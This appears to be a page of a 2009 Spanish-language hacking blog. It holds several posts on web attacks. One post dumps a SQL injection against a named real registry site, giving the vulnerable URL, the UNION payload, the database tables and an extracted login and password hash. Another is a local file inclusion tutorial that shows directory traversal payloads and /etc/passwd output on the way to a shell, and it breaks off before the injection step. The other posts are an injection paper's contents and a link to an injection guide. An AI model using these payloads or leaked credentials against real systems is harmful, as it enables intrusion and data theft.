[T]hanatos

Publicado el 18/09/2009 12:09:00 en Hacking Web.

---------------------------------------------------------------
Network Information Center Of Guadalupe
LINK:http://www.nic.gp/
--------------------------------------------------------------

Server Software: Apache/2.2.3(Debian) PHP/5.2.0-8+etch11
DataBase Version: 5.0.32-Debian_7etch6-log
Current User: www2@localhost
Current Database: db2
Supports Union: YES
Union Columns: 4

URL: http://www.nic.gp/news/newsReader.php?id=62

VULN: http://www.nic.gp/news/newsReader.php?id=62+and+1=0+Union+Select+1,2,3,4

Comment: --

Visible Column: 2,3,4

--------------------------
Database Information
--------------------------
information_schema
db2

-------------------------
Tables
-------------------------
Gate_MO
Gate_MT
Gate_MT_Status
alternative_name
contacts
countries
currencies
customer_type
domaines
domaines_corrupted
duration
extensions
forbidden_words
named
news
news_fr
news_us
pricing_zone
princing
pub
pub_statut
sessions
subdomain
webrequest
whoisrequest
wusers
------------------------
Columns: Table+wusers
------------------------
id
login
pass
------------------------
Concat: Table+Wusers
-------------------------

http://www.nic.gp/news/newsReader.php?id=-62+Union+Select+1,2,concat_ws(0x3a,id,login,pass),4+from+wusers--

Result: 1:pr:1d7f2cc41d686ece


*EOF*


Comentarios: 3 | Leer comentarios

Publicado el 16/09/2009 12:09:00 en Hacking Web. Total de votos: 11  Votar

##########
Contents
##########

[0x00] - Introduction

[0x01] - Know the Basic of SQL injection

[0x01a] - Introduction to SQL Injection Attack
[0x01b] - How to Test sites that are Vulnerable in SQL Injection
[0x01c] - Bypass Authentication with SQL Injection
[0x01d] - Audit Log Evasion
[0x01e] - (Perl Script) SQL-Google searching vulnerable sites

[0x02] - MSSQL Normal SQL Injection Attack

[0x02a] - ODBC Error Message Attack with "HAVING" and "GROUP BY"
[0x02b] - ODBC Error Message Attack with "CONVERT"
[0x02c] - MSSQL Injection with UNION Attack
[0x02d] - MSSQL Injection in Web Services (SOAP Injection)

[0x03] - MSSQL Blind SQL Injection Attack

[0x03a] - How to Test sites that are Vulnerable in Blind SQL Injection
[0x03b] - Determine data through Blind SQL Injection
[0x03c] - Exploit Query for get Table name
[0x03d] - Exploit Query for get Column name

[0x04] - More Dangerous SQL Injection Attack

[0x04a] - Dangerous from Extended Stored Procedures
[0x04b] - Advanced SQL Injection Techniques
[0x04c] - Mass MSSQL Injection Worms

[0x05] - MSSQL Injection Cheat Sheet

[0x06] - SQL Injection Countermeasures

[0x07] - References

[0x08] - Greetz To

LINK: http://milw0rm.com/papers/279

Comentarios: 7 | Leer comentarios

Publicado el 02/09/2009 12:09:00 en Hacking Web. Total de votos: 16  Votar

>>>>>>>>>>>>>>> Shell via LFI - proc/self/environ method <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>> Author : SirGod <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>> www.insecurity-ro.org <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>> www.h4cky0u.org <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>> sirgod08@gmail.com <<<<<<<<<<<<<<<

1 - Introduction
2 - Finding LFI
3 - Checking if proc/self/environ is accessible
4 - Injecting malicious code
5 - Access our shell
6 - Shoutz

>> 1 - Introduction

In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and
injection malicious code in proc/self/environ.Is a step by step tutorial.

>> 2 - Finding LFI

- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.

www.website.com/view.php?page=contact.php

- Now lets replace contact.php with ../ so the URL will become

www.website.com/view.php?page=../

and we got an error

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

big chances to have a Local File Inclusion vulnerability.Let's go to next step.

- Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :

www.website.com/view.php?page=../../../etc/passwd

we got error and no etc/passwd file

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up

www.website.com/view.php?page=../../../../../etc/passwd

we succesfully included the etc/passwd file.

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nolo...

Continúa aquí...

Comentarios: 14 | Leer comentarios

Publicado el 25/08/2009 12:08:00 en Hacking Web.

Aca les dejo esta guia practica de Inyecciones en BD MySQL... ;)
Espero que les sirva.

--------------------------------------------------------------------------------------
http://www.busindre.com/guia-rapida-de-inyecciones-en-bases-de-datos-mysql/

Comentarios: 15 | Leer comentarios

No hay más entradas.